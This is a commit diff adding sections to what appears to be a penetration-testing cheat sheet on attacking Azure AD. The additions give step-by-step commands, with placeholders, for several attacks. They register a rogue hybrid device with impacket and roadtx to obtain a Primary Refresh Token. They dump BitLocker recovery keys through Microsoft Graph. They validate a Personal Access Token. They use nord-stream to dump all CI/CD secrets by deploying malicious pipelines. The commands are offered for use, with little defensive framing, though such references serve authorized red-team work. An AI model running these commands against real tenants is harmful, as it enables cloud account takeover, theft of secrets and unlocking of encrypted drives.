Azure Devops + Devices + Bitlocker

pull/1/head
Swissky 2023-11-22 16:18:40 +01:00
parent 4947154dc7
commit e1341751c3
3 changed files with 65 additions and 3 deletions

View File

@ -129,6 +129,23 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
```
### Request a PRT with Hybrid Device
Requirements:
* ADDS user credentials
* hybrid environment (ADDS and Azure AD)
Use the user account to create a computer and request a PRT
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
* Get a PRT with device claim
```ps1
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
```
## References
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)

View File

@ -23,6 +23,16 @@
## Devices
### List Devices
```ps1
Connect-AzureAD
Get-AzureADDevice
$user = Get-AzureADUser -SearchString "username"
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
```
### Join Devices
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
@ -45,11 +55,21 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
```
### Bitlocker Keys
```ps1
Install-Module Microsoft.Graph -Scope CurrentUser
Import-Module Microsoft.Graph.Identity.SignIns
Connect-MgGraph -Scopes BitLockerKey.Read.All
Get-MgInformationProtectionBitlockerRecoveryKey -All
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
```
# Service Principals
# Other
## Other
Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
@ -57,3 +77,8 @@ Lists all the client IDs you can use to get a token with the `mail.read` scope o
roadtx getscope -s https://graph.microsoft.com/mail.read
roadtx findscope -s https://graph.microsoft.com/mail.read
```
## References
* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)

View File

@ -22,6 +22,25 @@ Runbook must be SAVED and PUBLISHED before running it.
```
## Azure Devops
* Verify the validity of an Azure Personal Access Token (PAT)
```ps1
PAT=""
organization=""
curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds
```
* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.
```ps1
# List all secrets from all projects
$ nord-stream.py devops --token "$PAT" --org myorg --list-secrets
# Dump all secrets from all projects
$ nord-stream.py devops --token "$PAT" --org myorg
```
## Microsoft Intune
* LAPS
@ -73,3 +92,4 @@ Get-MgDrive -top 1
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps)